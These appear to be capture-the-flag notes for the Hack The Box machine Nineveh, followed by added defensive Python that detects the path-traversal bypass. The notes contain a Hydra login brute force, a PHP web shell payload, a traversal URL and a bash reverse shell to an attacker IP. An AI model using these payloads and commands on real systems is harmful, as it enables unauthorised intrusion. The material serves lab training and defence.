3 :443
:80 :443 in parallel
https://nineveh.htb/
just an image loads up
$ gobuster dir -u https://nineveh.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 60 -k
===============================================================
/index.html (Status: 200) [Size: 49]
/db (Status: 301) [Size: 309] [--> https://nineveh.htb/db/]
/secure_notes (Status: 301) [Size: 319] [--> https://nineveh.htb/secure_notes/]
https://nineveh.htb/db/
phpLiteAdmin v1.9 page asking for password
| error on top: Warning: rand() expects parameter 2 to be integer, float given in /var/www/ssl/db/index.php on line 114
# path is /var/www/ssl/
# default password not working
https://nineveh.htb/secure_notes/
just an image
$ gobuster dir -u https://nineveh.htb/db -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80 -k
===============================================================
/index.php (Status: 200) [Size: 11430]
# nothing else to go on, brute force the login with hydra
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt nineveh.htb -s 443 https-form-post "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password.:H=Cookie: PHPSESSID=tfmr95s2pe6utd6ga3c8fui8a2"
# got password password123
# logged in
https://nineveh.htb/db/index.php
| no database
Using the notes exploit
1. create db kashz.php
2. path: /var/tmp/hack.php
3. create table kashz with 1 field
4. field name: shell | field type: TEXT | default value: <?php echo "<pre>" . shell_exec($_GET["cmd"]) . "</pre>"; ?>
http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../var/tmp/hack.php&cmd=whoami;id;hostname;uname%20-a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
nineveh
Linux nineveh 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
# only root has write perms
# calling the reverse shell directly, URL-encoded
http://nineveh.htb/department/manage.php?notes=/ninevehNotes/../var/tmp/hack.php&cmd=bash%20-c%20%27bash%20-i%20%3E%26%20/dev/tcp/10.10.16.7/6969%200%3E%261%27
$ nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.10.43] 46640
bash: cannot set terminal process group (1390): Inappropriate ioctl for device
bash: no job control in this shell
www-data@nineveh:/var/www/html/department$
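A defensive counterpart to the notes traversal above, added here and not part of the original notes or the box's application: the marker-only filter that the `/ninevehNotes/../` bypass implies (an assumption; manage.php's source is not shown on this page), a containment check built on path normalization, and a scan over constructed access-log lines that flags requests whose notes= value escapes the notes directory. The notes directory location and the function names are hypothetical.

```python
import os
import re
import urllib.parse
from typing import List, Optional, Tuple

# DOC_ROOT is visible in the shell prompt above; NOTES_DIR and the marker-only
# filter are assumptions inferred from the bypass, not the application's source.
DOC_ROOT = "/var/www/html/department"
NOTES_DIR = os.path.join(DOC_ROOT, "ninevehNotes")

def marker_only_check(notes: str) -> bool:
    """Weak filter the bypass implies: any value containing the marker passes."""
    return "ninevehNotes" in notes

def resolve_note(notes: str) -> Optional[str]:
    """Anchor the request under DOC_ROOT; return the normalized path only if it
    stays inside NOTES_DIR, else None."""
    if "\x00" in notes:                     # null-byte truncation
        return None
    # A leading '/' must not re-root the path, so strip it before joining.
    candidate = os.path.normpath(os.path.join(DOC_ROOT, notes.lstrip("/")))
    # normpath collapses '..' lexically; commonpath then compares whole path
    # components, unlike the substring test of the marker filter.
    if os.path.commonpath([candidate, NOTES_DIR]) != NOTES_DIR:
        return None
    return candidate

ACCESS_RE = re.compile(r'"GET (?P<url>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

def flag_traversal(log_lines: List[str]) -> List[Tuple[str, str]]:
    """Return (status, notes value) for requests whose notes= escapes NOTES_DIR."""
    hits = []
    for line in log_lines:
        m = ACCESS_RE.search(line)
        if not m:
            continue
        query = urllib.parse.urlparse(m["url"]).query
        for value in urllib.parse.parse_qs(query).get("notes", []):  # %xx decoded here
            if resolve_note(value) is None:
                hits.append((m["status"], value))
    return hits

# Constructed access-log lines for demonstration (not captured from the box).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:00:00:01 +0000] "GET /department/manage.php?notes=/ninevehNotes/todo.txt HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2020:00:00:02 +0000] "GET /department/manage.php?notes=/ninevehNotes/../var/tmp/hack.php HTTP/1.1" 200 230',
]

if __name__ == "__main__":
    print(flag_traversal(SAMPLE_LOG))  # [('200', '/ninevehNotes/../var/tmp/hack.php')]
```

The same containment check can back a web server rule or WAF signature; the point is that the decision rests on the normalized path, not on whether a marker string appears somewhere in the parameter.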